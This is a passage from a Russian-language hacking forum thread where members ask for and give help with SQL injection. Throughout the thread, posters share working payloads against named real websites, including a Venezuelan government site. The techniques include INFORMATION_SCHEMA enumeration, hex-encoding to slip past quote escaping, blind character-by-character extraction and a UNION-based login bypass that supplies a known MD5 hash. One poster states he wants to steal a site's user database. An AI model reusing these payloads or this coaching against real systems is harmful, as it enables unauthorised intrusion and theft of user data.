Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    bumerok, юзай подзапросы
    http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496+or+1=(select+top+1+table_name+from+information_schema.tables);--
     
  2. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    если ?=(select name_const((select 1),1)) true, то лучше так:
     
    4 people like this.
  3. peonix

    peonix New Member

    Joined:
    8 Nov 2008
    Messages:
    32
    Likes Received:
    2
    Reputations:
    -1
    Привет всем! Можно ли обойти вот такую защиту?
    Все параметры обрабатываются вот такой функцией:
     
  4. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    for you with love
     
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Есть SQL запрос.
    1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
    Т.е. ' нефильтруется и т.п.
    НО
    Фильтруется > на _.
    Что делать?
    ps
    %3E
    Неработает :(
     
  6. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    370
    Likes Received:
    92
    Reputations:
    5
    Можете кто нить разжевать в чем проблема.
    Вывод дает PROFILING (я так понял это имя таблици), делаю дальше
    и мне выдает ошибку
    че за херня ?(
     
  7. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    Вывод дает PROFILING (я так понял это имя таблици), делаю дальше
    Цитата:
    http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=PRO FILING+limit+0,1--

    потому что надо имя таблицы брать в кавычки

    http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='PROFILING'+limit+0,1--

    но у тебя они слэшируются, значит переводи в hex


    http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x50524f46494c494e47--
     
    _________________________
    2 people like this.
  8. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    как правильно использовать SQL Hex?
    Допустим login=0x73716C696E6A666C6432 Ничего не выдаёт
    Нужно ещё что-то перед хексом прописать?
     
  9. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    370
    Likes Received:
    92
    Reputations:
    5
    едрён батон, так вот почему у меня в старых записках в хексе было написано это :))) спс
     
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Ну например заюзать between

    1' and 1=if(ascii(substring(user(),1,1)) between 0 and 150,1,0)--+

    А ты уверен, что что-то должно выдавать именно на этот логин? =)

    Какбэ и все
     
    1 person likes this.
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    дык делать просто "=" и пройтись по всем нужным ASCII
     
    1 person likes this.
  12. sanbl4

    sanbl4 Banned

    Joined:
    20 Feb 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток.
    имеется сайт на движке joomla (хз какая версия... - $Id: configuration.php-dist 11687 2009-03-11 17:49:23Z ian $ (может кто подскажет что за версия))
    путь к админке я нашёл, правда хз что с ней делать.
    попробывал вот эту скуль index.php?option=com_content&task=vote&id=1&Itemid =1&cid=1&user_rating=1,rating_sum=[sql (любая цифра)] - на странице отобразилась шапка сайта и правая сторона, в середине всё пустое...(интересно что это даёт...).
    затем нашёл путь _http://sate.ru/plugins/content/highslide/ там рисунки.
    в чём самый прикол то, что какие бы скуль инжект не забивал в строку вот таким способом - _http://sate.ru/index.php..скульинжект то всё время показывает ошибку 404, а когда забиваю таким способом - _http://sate/administrator/index.php..скульинжект то ни чего не выдаётся и не изменяется, просто как бы прогрузочка прошла и всё...а что изменилось или нет...хз....
    так вот может кто подскажет что да как, может ссылочки какие даст кто, а то всё уже перечитал, хочу ещё чёнить почитать повтыкать, или совет какой попробывать....
    А цель вообще всего этого, попробывать БД стянуть, не так давно на этом ресурсе 3 акка моих кто то спёр, вот хочу попробывать тоже...заодно разобраться во всём этом...)))
    зы. знаю 100% что другте люди тырят от туда базу, это очевидно по тому что мои данные стырили....
    зыы. попробывал методы которые описываются здесь реакции ноль...
     
  13. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    323
    Likes Received:
    110
    Reputations:
    18
    Работает или Microsoft-IIS/5.0 Htaccess?
    надо сделать запрет на выполнение пхп
    Code:
    RemoveHandler .php .phtml .php3
    AddType application/x-httpd-php-source .php .phtml .php3
    он его не воспринимает вообще,если оно так и должно быть то как найти вход?
     
    #9033 Shadrin, 27 Sep 2009
    Last edited: 27 Sep 2009
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Shadrin, .ht* только для apache!

    Есть бажный сайт, при подставке кавычки в авторизацию пишет
    Code:
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
    
    select * from customers where customers_email_address='''
    
    [TEP STOP]
    
    Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже...
     
  15. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    пробуй ' or 1=1 /* ,если я не ошибаюсь то запрос многострочный.
     
    2 people like this.
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Запрос НЕ многострочный:
    1. Запрос видно в ошибке.
    2. Если бы я обрезал только одну строку комментарием #, то была бы ошибка.
    3. Комментарий /* режет.
     
    1 person likes this.
  17. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    посмотри на запрос, у тебя он возвращает любой поле
    авторизация (например) [данные-из-какой-то-колонки-customers]+pass
    юзай вывод в ошибках
    /add более подробно написано ниже)
     
    #9037 l1ght, 27 Sep 2009
    Last edited: 27 Sep 2009
  18. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    581
    Reputations:
    256
    mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
    Т.е. там что-то типо такого:
    PHP:
    $res mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
    $item mysql_fetch_array($res);
    if(
    md5($_POST['password']) == $item['password']) {
    echo 
    "LOGINED"!
    } else {
    echo 
    "FAIL!";
    }
    Как вариант:
    1. Узнать количество столбцов
    2. Узнать в каком столбце хранится пароль
    3. используя union select вернуть те данные, которые подойдут для успешного логина.

    Те:
    Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
    login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
    password: qwerty
     
    4 people like this.
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Точно... Просто привык, что все данные берутся из БД, никогда не встречался с такими скриптами, поэтому и не понял :)
     
  20. Merl00k

    Merl00k Member

    Joined:
    6 Nov 2008
    Messages:
    27
    Likes Received:
    10
    Reputations:
    0
    Ребят что это за бага? http://www.sys-tema.ru/index.jsp?pk=' (если вообще бага)
     
Loading...
Thread Status:
Not open for further replies.